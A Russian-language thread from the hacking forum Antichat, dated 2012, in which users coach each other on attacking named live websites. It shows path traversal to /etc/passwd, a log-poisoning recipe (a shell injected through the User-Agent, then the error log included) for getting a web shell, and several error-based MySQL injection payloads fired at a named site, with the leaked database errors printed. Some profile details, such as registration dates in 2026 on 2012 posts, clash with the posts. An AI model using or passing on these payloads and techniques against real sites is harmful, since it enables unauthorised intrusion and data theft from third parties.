ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.08.2012, 00:49
|
|
Новичок
Регистрация: 12.04.2026
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Решил попрактиковаться в Php inj,вобщем взял сайт из раздачи-вот "http://macrohosting.ru/?"
Делаю запрос ../../../../etc/passwd (good),дальше пробую proc/self/environ выводится какая то елда в виде "?????????????????????????" Собственно вопрос:что это такое? и какие ещё есть способы залития шелла?. Читал про error.log но толком не понял как это делается.
|
|
|
05.08.2012, 02:23
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
to Testosteron
Если вкратце, то например вставляете в поле User-Agent мини шелл (например ), вызываете ошибку, данные записываются в error.log, дальше вы инклудите этот файл (если конечно нашли его месторасположение на сервере) и дальше работаете с ним "http://macrohosting.ru/?file=../../../../var/logs/error.log& e=phpinfo();"
UPD. Можете прочитать тут по этому поводу...
Да и не забудьте проверить wrappers! |
|
|
|
05.08.2012, 02:46
|
|
Новичок
Регистрация: 12.04.2026
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Ага понятно. Спасибо за помощь)
Пошёл изучать
|
|
|
|
05.08.2012, 17:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
34457
Репутация:
-10
|
|
Подскажите где можна почитать о sql ?Как что подставлять.
|
|
|
|
05.08.2012, 17:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
2Sat-hacker прочитать можно про скуль почти от А до Я на крупном хек сайте /
Ваш КЭП!
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
05.08.2012, 17:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
34457
Репутация:
-10
|
|
shell_c0de а ссылочку на от а до я можна не могу найти.
|
|
|
|
05.08.2012, 17:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
697724
Репутация:
372
|
|
/thread43966.html
|
|
|
|
05.08.2012, 22:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
28549
Репутация:
6
|
|
www.bondware.com
помогите плз со скулей, версия '5.0.77-log'но таблицы не хочет выводить
/?1'or(select*from(select(name_const(version(),1)), na me_const(version(),1))a)and(1)='1
Сообщение от None
MySQL error: Duplicate column name '5.0.77-log', occured in query: "insert into bw30_tracking set ip = '235.25.206.61', referrer = '', page = '/index.php?1'or(select*from(select(name_const(versi on(),1)),name_const(version(),1))a)and(1)='1', date_visited = NOW(), user_agent = 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)', session = '068o5fjspb9abulhecd9rnrrt3', host = '235.25.206.61'".
побывал так
Код:
Code:
1'or(select+1+from(select+count(*),concat((select+ table_name+from+information_schema.tables+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tabl es+g roup+by+x)a)and(1)='1
Сообщение от None
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from(select+count(*),concat((select+table_name+fr om+information_schema.tables+li' at line 4, occured in query: "insert into bw30_tracking set ip = '235.25.206.61', referrer = '', page = '/index.php?1'or(select+1+from(select+count(*),conca t((select+table_name+from+information_schema.table s+limit+0,1),floor(rand(0)*2))x+from+information_s chema.tabl%20es+group+by+x)a)and(1)='1', date_visited = NOW(), user_agent = 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)', session = '068o5fjspb9abulhecd9rnrrt3', host = '235.25.206.61'".
если так
Код:
Code:
/?1'or(select/**/1/**/from(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.columns/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.columns/**/group/**/by/**/x)a)and(1)='1
Сообщение от None
MySQL error: Duplicate entry '
CHARACTER_SETS1
' for key 1, occured in query: "insert into bw30_tracking set ip = '84.109.214.211', referrer = '', page = 'http://www.bondware.com/index.php?1'or(select/**/1/**/from(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.columns/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.columns/**/group/**/by/**/x)a)and(1)='1', date_visited = NOW(), user_agent = 'Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/10.0.1', session = 'r891pk3kpk3u6us67e2ppt7e22', host = 'bzq-84-109-214-211.red.bezeqint.net'".
то, что жирненькое, таблица limit 0,1 |
|
|
|
06.08.2012, 00:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
45774
Репутация:
26
|
|
2Gaben7, чем тебе еще помочь? на рдоте те уже и так все сделали...
лимиты крути.
|
|
|
|
06.08.2012, 01:07
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
Провел на форуме:
71852
Репутация:
0
|
|
Товарищи Гуру-инъектры! Вобщем даже незнаю как вам на пальцах объяснить....
В скрипте запрос записывает данные, которые вписал юзер из формы, в БД.
Код:
Code:
INSERT INTO servers(map,ip,port,status) VALUES ($map,$ip,$port,$status);
Когда в поле ввожу одинарную ковычку, то при отправке формы выскакивает ошибка на странице:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '32', `map`='ggg', `status`='1' WHERE `ip`' at line 3"
Я в поля уже и select @@version тыкал, оно просто отображает это как текст. Даже не знаю что и делать
Может кто подскажет как это дело раскрутить до конца? |
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
